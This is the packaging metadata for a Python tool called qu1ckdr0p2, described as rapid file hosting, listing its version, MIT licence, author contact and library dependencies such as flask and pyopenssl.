Metadata-Version: 2.1
Name: qu1ckdr0p2
Version: 2.5.6
Summary: Rapid file hosting.
License: MIT
Author: byinarie
Author-email: byinarie@gmail.com
Requires-Python: >=3.11.0,<4.0.0
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.11
Requires-Dist: click (>=8.0,<9.0)
Requires-Dist: configparser (>=6.0,<7.0)
Requires-Dist: flask (>=2.0,<3.0)
Requires-Dist: halo (>=0.0.31,<0.0.32)
Requires-Dist: keyboard (>=0.13.5,<0.14.0)
Requires-Dist: netifaces (>=0.11,<0.12)
Requires-Dist: pyopenssl (>=23.0,<24.0)
Requires-Dist: pyperclip (>=1.8.2,<2.0.0)
Requires-Dist: requests (>=2.31,<3.0)
Requires-Dist: tqdm (>=4.0,<5.0)
